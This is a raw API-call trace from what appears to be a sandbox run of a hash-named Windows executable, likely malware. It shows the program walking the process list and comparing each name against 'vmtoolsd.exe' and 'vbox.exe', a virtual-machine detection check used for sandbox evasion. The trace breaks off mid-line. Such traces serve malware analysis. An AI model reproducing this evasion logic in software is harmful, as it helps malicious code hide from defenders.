cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0121.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fpos.exe", cchCount1=8, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.968] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0121.969] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mxslipstream.exe", cchCount1=16, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.969] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0121.971] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="isspos.exe", cchCount1=10, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.971] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0121.973] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="edcsvr.exe", cchCount1=10, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.973] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0121.975] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="omnipos.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.975] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0121.976] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="spcwin.exe", cchCount1=10, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.976] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x132c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0121.978] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="spgagentservice.exe", cchCount1=19, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.978] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0121.980] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="utg2.exe", cchCount1=8, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.980] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="force which baby.exe")) returned 1 [0121.981] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="force which baby.exe", cchCount1=20, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0121.981] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="drive_law.exe")) returned 1 [0122.011] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="drive_law.exe", cchCount1=13, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0122.011] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="nor development rather.exe")) returned 1 [0122.013] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nor development rather.exe", cchCount1=26, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0122.013] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0122.015] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="backgroundTaskHost.exe", cchCount1=22, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0122.015] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0122.017] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="taskhostw.exe", cchCount1=13, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0122.017] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x87c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0122.019] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="msfeedssync.exe", cchCount1=15, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0122.019] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0122.020] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UsoClient.exe", cchCount1=13, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0122.020] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="sc.exe")) returned 1 [0122.021] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sc.exe", cchCount1=6, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0122.022] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0122.025] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="backgroundTaskHost.exe", cchCount1=22, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0122.025] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0122.027] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="audiodg.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0122.027] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x180, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0122.029] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="conhost.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0122.029] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xc98, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0122.031] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="conhost.exe", cchCount1=11, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0122.031] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe")) returned 1 [0122.033] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe", cchCount1=68, lpString2="vmtoolsd.exe", cchCount2=12) returned 1 [0122.033] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0.exe")) returned 0 [0122.034] CloseHandle (hObject=0x208) returned 1 [0122.034] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0122.034] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0122.034] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0122.034] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0122.034] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0122.035] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.035] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0122.035] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.035] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0122.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef10 [0122.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0122.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef710 [0122.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0122.035] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0122.035] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0122.035] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0122.035] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x208 [0122.044] Process32FirstW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.045] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0122.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0122.046] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0122.062] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0122.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0122.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0122.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0122.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd610 [0122.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0122.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0122.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0122.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0122.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0122.063] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd628 [0122.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef890 [0122.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0122.064] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd658 [0122.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0122.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0122.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd628 | out: hHeap=0x12c0000) returned 1 [0122.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0122.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0122.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0122.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd3d0 | out: hHeap=0x12c0000) returned 1 [0122.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0122.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd610 | out: hHeap=0x12c0000) returned 1 [0122.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7f0 | out: hHeap=0x12c0000) returned 1 [0122.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0122.064] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0122.065] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="System", cchCount1=6, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0122.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0122.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0122.065] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0122.065] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0122.067] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0122.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0122.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0122.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0122.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0122.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0122.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0122.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef890 [0122.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd598 [0122.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0122.068] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0122.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0122.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0122.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef790 [0122.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd640 | out: hHeap=0x12c0000) returned 1 [0122.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb00 [0122.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0122.069] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd430 [0122.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd430 | out: hHeap=0x12c0000) returned 1 [0122.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0122.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4d8 | out: hHeap=0x12c0000) returned 1 [0122.069] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef790 | out: hHeap=0x12c0000) returned 1 [0122.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12feb00 | out: hHeap=0x12c0000) returned 1 [0122.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd598 | out: hHeap=0x12c0000) returned 1 [0122.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0122.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0122.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0122.070] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0122.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0122.071] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300ce8 [0122.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0122.071] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="smss.exe", cchCount1=8, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0122.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0122.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300ce8 | out: hHeap=0x12c0000) returned 1 [0122.071] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0122.071] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0122.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0122.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0122.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0122.073] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0122.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0122.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0122.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0122.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0122.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd418 [0122.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef710 [0122.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0122.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0122.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd658 [0122.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0122.074] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0122.074] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0122.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0122.075] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0122.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6b8 | out: hHeap=0x12c0000) returned 1 [0122.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd658 | out: hHeap=0x12c0000) returned 1 [0122.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0122.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee98 | out: hHeap=0x12c0000) returned 1 [0122.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef750 | out: hHeap=0x12c0000) returned 1 [0122.075] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd418 | out: hHeap=0x12c0000) returned 1 [0122.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef710 | out: hHeap=0x12c0000) returned 1 [0122.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0122.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef700 | out: hHeap=0x12c0000) returned 1 [0122.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0122.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0122.076] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x13011f0 [0122.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0122.076] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="csrss.exe", cchCount1=9, lpString2="vbox.exe", cchCount2=8) returned 1 [0122.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0122.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6f0 | out: hHeap=0x12c0000) returned 1 [0122.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13011f0 | out: hHeap=0x12c0000) returned 1 [0122.076] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0122.077] Process32NextW (in: hSnapshot=0x208, lppe=0x7df6d0 | out: lppe=0x7df6d0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0122.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0122.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0122.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0122.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0122.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb00 [0122.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0122.078] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0122.079] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 